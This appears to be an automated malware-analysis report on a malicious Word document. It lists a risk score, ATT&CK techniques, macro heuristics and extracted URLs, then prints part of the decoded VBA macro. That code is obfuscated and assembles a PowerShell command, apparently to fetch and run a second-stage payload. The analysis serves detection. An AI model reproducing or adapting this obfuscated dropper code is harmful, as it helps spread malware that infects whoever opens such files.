MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing VBA macros. The AutoOpen macro and Shell() call heuristics indicate malicious intent. The VBA script attempts to construct and execute a PowerShell command, likely to download and execute a second-stage payload from one of the embedded unknown URLs. The presence of legacy WordBasic auto-exec markers further supports the malicious nature of the document.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://hcqByojNtoPlSw8TA8lilcfM In document text (OLE body)
- http://jo8TA8lhUcfMn9YGpatJFIZbx107seZG99WhsB25cAKSxIn document text (OLE body)
- http://akByojNtoPlSw8TA8lhUcfMB25GpaIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 200938 bytes |
SHA-256: 320078377720a8556400e9701bc38c538d99d54df7a12c1eecb13a0dd82d8be2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "nCDiEEIt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function PknBwwHEIN()
On Error Resume Next
TmBbzIJfsBv = (TlwLlGO - CDbl(958100) + ZBObRlH + Fix(iipNp / CLng(85841 * Sqr(SGbcwvj))) - 812524 / Sin(tiRdf - CFcKczVRYZJ - 734377 + CLng(BJAJLi)) * 727820 * Fix(958100))
wODaR = "8N1qZthnPJI9vyFcsUmbkiIk2vvowershell JKgTTd&( $SHeLLID[15HoeytcL2vJPe"
ChqdqdE = Left(Right(wODaR, 42), 10) + Left(Right(wODaR, 26), 13)
SXqRE = "]VX"
qSKArjDF = Left(Right(SXqRE, 3), 1)
wPwHqHR = Chr(43)
dMBJt = "kwBbXdVJxrEsdv3Ro27oHh$Shellid[13Q]M"
OALifojfT = Left(Right(dMBJt, 14), 11) + Left(Right(dMBJt, 2), 1)
IuuwDbWfFFC = Chr(43)
iBScVjtuwaf = "r5Vv8ljE[DqBXPqEbnxQvda.nAXZQGBRiSnr& ((Gv B25*MdR*B25)EU0wEDAheMP'X') ( ((' UQRkVxvdvn9JZNRmMrJHo3f44Rcik3l"
dJVwAdAJM = CStr(Left(Right(iBScVjtuwaf, 42), 11)) + Left(Right(iBScVjtuwaf, 72), 19) + Left(Right(iBScVjtuwaf, 85), 3) + CStr(Left(Right(iBScVjtuwaf, 44), 1)) + CStr(Left(Right(iBScVjtuwaf, 101), 2))
LizuhTS = "r5Vv8l25uDqBXPqEbnxQvdnsatXZQGBRiSNB25B25)( (B25nPIFeY8EU0wEBA3,11,2]-JoiswvAUQRkVxvdvn9JZNRmMrJHo3f44"
YtbctuKd = Left(Right(LizuhTS, 40), 11) + CStr(Left(Right(LizuhTS, 68), 17)) + CStr(Left(Right(LizuhTS, 80), 3)) + CStr(Left(Right(LizuhTS, 42), 1)) + Left(Right(LizuhTS, 96), 2)
UXmuKZwM = Chr(43)
BiUtWcGBo = "GptdVtRB256aWAL5fjaB2wMr"
kKCMhjX = Left(Right(BiUtWcGBo, 17), 3) + Left(Right(BiUtWcGBo, 21), 1) + CStr(Left(Right(BiUtWcGBo, 6), 3)) + CStr(Left(Right(BiUtWcGBo, 9), 1))
NhnGi = Chr(43)
fZBWMMr = (rjcpT - CDbl(423859) + OFMoXbknHp + Fix(hwcjnCIl / CLng(23827 * Sqr(zjjLJoiWqv))) - 437427 / Sin(mKstlCWBaj - RLviNPYEdU - 524734 + CLng(iqiYA)) * 648476 * Fix(423859))
FRMkzvGMY = "VtR0Md6aWAB25sJK6w5r4Tf2ePz = &BhmPr"
jRZQwinpc = CStr(Left(Right(FRMkzvGMY, 26), 4)) + Left(Right(FRMkzvGMY, 31), 1) + Left(Right(FRMkzvGMY, 9), 5) + CStr(Left(Right(FRMkzvGMY, 13), 1)) + CStr(Left(Right(FRMkzvGMY, 18), 1))
RKFNUbjLjif = Chr(43)
lGTpwMH = "Gpt(VtRB256aWAL5fjeB2wMr"
CMsQTuGsmZk = Left(Right(lGTpwMH, 17), 3) + Left(Right(lGTpwMH, 21), 1) + CStr(Left(Right(lGTpwMH, 6), 3)) + CStr(Left(Right(lGTpwMH, 9), 1))
VvUTMvVptA = Chr(43)
ZLtAoHcN = "GptWYtR0B25pWALtfjJ56wMneB2jeP"
PWbfTINjh = CStr(Left(Right(ZLtAoHcN, 22), 4)) + CStr(Left(Right(ZLtAoHcN, 26), 1)) + CStr(Left(Right(ZLtAoHcN, 7), 4)) + Left(Right(ZLtAoHcN, 11), 1)
MpEBfdurPm = (ZtDkkjHwj - CDbl(253197) + cHInopBjG + Fix(tOrULj / CLng(451191 * Sqr(htlSdv))) - 615760 / Sin(owWjI - wSSDjiwNro - 207459 + CLng(IIZqKBiZDS)) * 858182 * Fix(253197))
XvaFs = Chr(43)
wmETOtROwm = "Tg5pB2VtR0MfpYW"
qwQVqqZYu = Left(Right(wmETOtROwm, 11), 2) + Left(Right(wmETOtROwm, 13), 1) + CStr(Left(Right(wmETOtROwm, 3), 2))
NZtDozAB = Chr(43)
MLlsO = "TgBpepVtR0Mf2'W"
muFcbWSLon = Left(Right(MLlsO, 11), 2) + Left(Right(MLlsO, 13), 1) + CStr(Left(Right(MLlsO, 3), 2))
XvYRGo = (VpzYikkuLv - CDbl(782542) + iiElSNaEH + Fix(LEOJWb / CLng(207051 * Sqr(FqAiVnO))) - 467999 / Sin(jQizCzFb - aKIldLrB - 692323 + CLng(XKkkPIIVp)) * 269438 * Fix(782542))
oVjLcDWf = Chr(43)
dtuMAEtXM = "5'TgGp"
TFWzd = CStr(Left(Right(dtuMAEtXM, 5), 1)) + CStr(Left(Right(dtuMAEtXM, 6), 1))
JGPWjK = Chr(43)
TtwkcdhmFw = "GptYVtR0B25aWALtf'JKeepY4Tf"
GBQTRQiV = CStr(Left(Right(TtwkcdhmFw, 19), 3)) + CStr(Left(Right(TtwkcdhmFw, 24), 1)) + Left(Right(TtwkcdhmFw, 7), 4) + CStr(Left(Right(TtwkcdhmFw, 10), 1))
OZXwP = (PhvJlFB - CDbl(868230) + cArElIoQJ + Fix(iiWjUIr / CLng(844137 * Sqr(ucGShhd))) - 85293 / Sin(pnuwUwdW - jRXLNNwPHTl - 392374 + CLng(fMmSRKZZKSJ)) * 796508 * Fix(868230))
DZJjATUfw = Chr(43)
KpNTziOvtCj = "'Be"
TvlCzEqPnu = CStr(Left(Right(KpNTziOvtCj, 3), 1))
rqmmzKI = Chr(43)
BZEPVVESHST = "TYGepWVtR0'f"
SwmVFvm = Left(Right(BZEPVVESHST, 9), 2) + CStr(Left(Right(BZEPVVESHST, 11), 1)) + CStr(Left(Right(BZEPVVESHST, 2), 1))
VrnQdih = Chr(43)
jILcUkwv = "Gp-WV'w0Mf65WB2tfj"
sDXDw
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.